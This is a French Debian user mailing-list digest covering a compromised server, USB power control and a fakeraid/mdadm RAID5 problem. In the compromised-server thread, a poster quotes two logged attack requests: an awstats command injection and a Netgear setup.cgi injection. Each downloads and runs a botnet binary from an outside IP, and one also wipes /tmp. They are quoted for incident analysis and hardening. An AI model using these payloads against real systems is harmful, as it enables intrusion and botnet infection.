Re: Machine vérolée

2023-06-25 Par sujet Sébastien Dinot 
BERTRAND Joël a écrit :
> Porte d'entrée trouvée :

Merci pour ce retour, toujours intéressant à avoir.

Sébastien

-- 
Sébastien Dinot, sebastien.di...@free.fr
http://www.palabritudes.net/
Ne goutez pas au logiciel libre, vous ne pourriez plus vous en passer !

Re: Machine vérolée

2023-06-25 Par sujet BERTRAND Joël 
Porte d'entrée trouvée :

GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
 HTTP/1.1\n"

"GET
/setup.cgi?next_file=netgear.cfg=syscmd=rm+-rf+/tmp/*;wget+http://27.45.37.235:51873/Mozi.m+-O+/tmp/netgear;sh+netgear=/=1
HTTP/1.0"

La seconde requête échoue (firewall sortant et script inexistant). Ce
que je ne saisis pas, c'est pourquoi la première est passée, awstats
étant protégé par .htpasswd.

JB

Re: Machine vérolée

2023-06-25 Par sujet BERTRAND Joël 
Quelques nouvelles.

Le bot en question est une version moderne d'un vieux truc (on en
trouve des traces depuis 2003) :

https://www.politoinc.com/post/2015/04/01/analysis-of-a-romanian-botnet
https://forum.directadmin.com/threads/cannot-restart-apache.17795/
https://forums.gentoo.org/viewtopic-t-316934-postdays-0-postorder-asc-start-0.html

Je n'ai rien trouvé de bizarre en examinant les disques. Je me demande
si ce vers ne vient pas par une injection externe, la machine ayant été
tagguée quelque part comme vulnérable. Le bot ne se lance pas à une
heure précise comme dans le cas d'un cron (apache2 utilise mod-secure).

Petite remarque : j'ai modifié allow_url_fopen de on à off dans le
fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on'
par défaut). /tmp est maintenant en noexec.

À suivre.

JB

Re: Re : Re: RAID5 (Mdadm) non fonctionnel sous Debian 11

2023-06-25 Par sujet didier gaumet 



Rappel: RAID, je n'y connais rien, jamais utilisé, jamais configuré

Comme Hughes le dit, sous Debian (je ne sais pas sous d'autres 
distributions comment c'est géré), la manière habituelle de gérer le 
Fakeraid (les cartes RAID logicielles (via l'UEFI/BIOS), pas les vraies 
cartes RAID matérielles (un peu la même distinction qu'il y a 20 ans les 
winmodems et les vrais modems matériels)  c'est via dmraid, pas via mdadm.


Ceci dit, il semblerait qu'on puisse forcer l'emploi de mdadm même pour 
du Fakeraid (au lieu de son emploi habituel pour du raid strictement 
logiciel au niveau de l'OS Linux):

https://wiki.debian.org/DebianInstaller/SataRaid
(sauter au paragraphe "Troubleshooting / Alternatives (mdadm)"

pour l'utilisation de mdadm (que je ne maîtrise pas), je te renvoie vers 
les wiki Debian et Archlinux):

https://wiki.debian.org/SoftwareRAID
https://wiki.archlinux.org/title/RAID

Je crains de ne pas pouvoir t'aiguiller davantage sur ce sujet (je peux 
continuer à discuter mais ça ne va pas t'avancer à grand chose vu mon 
faible (euphémisme) niveau sur toutes les sortes de RAID :-)

Re: on/off alimentation port USB

2023-06-25 Par sujet didier gaumet 

Bonjour,

connecte ton smartphone à ton PC via USB, il y a une notification dans 
la barre des tâches Android informant que l'appareil est en charge: 
clique dessus et tu te vois offrir un menu au sujet:
- du directeur de la liaison: le PC dirige ou le smartphone dirige (ce 
dernier par défaut)
- du type de liaison: charge ou transfert (avec choix du sous-type de 
transfert)


donc dans ce menu, je pense que si tu veux que le PC puisse forcer la 
charge ou au contraire l'interdire, il faut que tu sélectionnes ton Pc 
en tant que directeur

Re: on/off alimentation port USB

2023-06-25 Par sujet Billard François-Marie 

Bonjour

je ne suis pas spécialiste mais ici il semblerait que cette option 
/power/level ai changé


https://stackoverflow.com/questions/4702216/controlling-a-usb-power-supply-on-off-with-linux

peut être dans cette page une piste sur la gestion de l'alimentation :

https://www.kernel.org/doc/html/v6.1/driver-api/usb/power-management.html?highlight=power+management+usb

cordialement

François-Marie

Le 25/06/2023 à 10:08, Vincent charente a écrit :

Bonjour à tous,

Je suis sur Debian Buster et je cherche un moyen de piloter 
l'alimentation d'un port USB.
J'ai branché mon smartphone sur un port usb et essayé les commandes 
suivantes :
|echo on > /sys/bus/usb/devices/usb1/power/level # turn on echo 
suspend > /sys/bus/usb/devices/usb1/power/level # turn off |

|Mais rien à faire, mon smartphone indique toujours qu'il est en charge. |
|Une idée ? |
|Merci |

on/off alimentation port USB

2023-06-25 Par sujet Vincent charente 
Bonjour à tous,

Je suis sur Debian Buster et je cherche un moyen de piloter l'alimentation
d'un port USB.
J'ai branché mon smartphone sur un port usb et essayé les commandes
suivantes :

echo on > /sys/bus/usb/devices/usb1/power/level   # turn on
echo suspend > /sys/bus/usb/devices/usb1/power/level  # turn off

Mais rien à faire, mon smartphone indique toujours qu'il est en charge.

Une idée ?

Merci

Re : Re: RAID5 (Mdadm) non fonctionnel sous Debian 11

2023-06-25 Par sujet Hugues Larrive 
Bonjour,

Je vais peut-être dire des bêtises je crois que mdadm gère le raid software 
sous linux avec son propre format. Pour les formats proprios il me semble que 
c'est dmraid qu'il faut utiliser.

@+
Hugues


--- Original Message ---
Le dimanche 25 juin 2023 à 00:45, Romain P.  a écrit :


> 

> 

> Le 23/06/2023 à 10:10, Didier gaumet a écrit :
> 

> > tu dis être passé de Debian 10 Buster à Debian 11 Bullseye mais la trace
> > de tentative d'installation citée ci-dessus me semble indiquer
> > clairement que tu es toujours sous Debian 10 Buster (paquet mdmadm 4.1.1
> > au lieu de 4.1.11, source "Buster" au lieu de Bullseye, noyau(x) 4.19 au
> > lieu de 5.10).
> 

> 

> Bonjour
> 

> J'ai désinstallé et réinstallé mdadm et c'est la version 4.1-11 qui est
> installée.
> 

> Les informations indiquées précédemment correspondaient à un ancien
> fichier, probablement car j'ai gardé la même partition pour Home sans la
> formater.
> 

> Mais mon RAID5 n'est toujours pas reconnu automatiquement.
> 

> En essayant de forcer l'assemblage ça ne fonctionne pas :
> "
> sudo mdadm --assemble /dev/md0 /dev/sda /dev/sdb /dev/sdc /dev/sdd
> 

> mdadm: No OROM/EFI properties for /dev/sda
> mdadm: no RAID superblock on /dev/sda
> mdadm: /dev/sda has no superblock - assembly aborted
> "
> 

> Mais en examinant les partitions, c'est bien du RAID5 :
> "
> sudo mdadm --examine /dev/sda
> 

> /dev/sda:
> Magic : Intel Raid ISM Cfg Sig.
> Version : 1.3.00
> Orig Family : f751d0bb
> Family : f751d0bb
> Generation : 000b1946
> Attributes : All supported
> UUID : 348fae05:95609190:20c5dbcb:2fefd6f4
> Checksum : 98449c4d correct
> MPB Sectors : 2
> Disks : 4
> RAID Devices : 1
> 

> Disk00 Serial : WD-WCC3F5XC5TJS
> State : active
> Id : 0002
> Usable Size : 1953520384 (931.51 GiB 1000.20 GB)
> 

> [RAID5_4WD_Blue]:
> UUID : 3155a654:c22e1cde:d82116aa:d6bae2ce
> RAID Level : 5
> Members : 4
> Slots : []
> Failed disk : none
> This Slot : 0
> Sector Size : 512
> Array Size : 5860560896 (2794.53 GiB 3000.61 GB)
> Per Dev Size : 1953520648 (931.51 GiB 1000.20 GB)
> Sector Offset : 0
> Num Stripes : 15261878
> Chunk Size : 64 KiB
> Reserved : 0
> Migrate State : idle
> Map State : normal
> Dirty State : clean
> RWH Policy : off
> 

> Disk01 Serial : WD-WCC3F3EY6D66
> State : active
> Id : 0005
> Usable Size : 1953520384 (931.51 GiB 1000.20 GB)
> 

> Disk02 Serial : WD-WCC3F6SZK26H
> State : active
> Id : 0004
> Usable Size : 1953520384 (931.51 GiB 1000.20 GB)
> 

> Disk03 Serial : WD-WCC3F5XC5E5N
> State : active
> Id : 0003
> Usable Size : 1953520384 (931.51 GiB 1000.20 GB)
> "
> 

> Merci
> 

> Romain

publickey - hlarrive@pm.me - 0xE9429B87.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature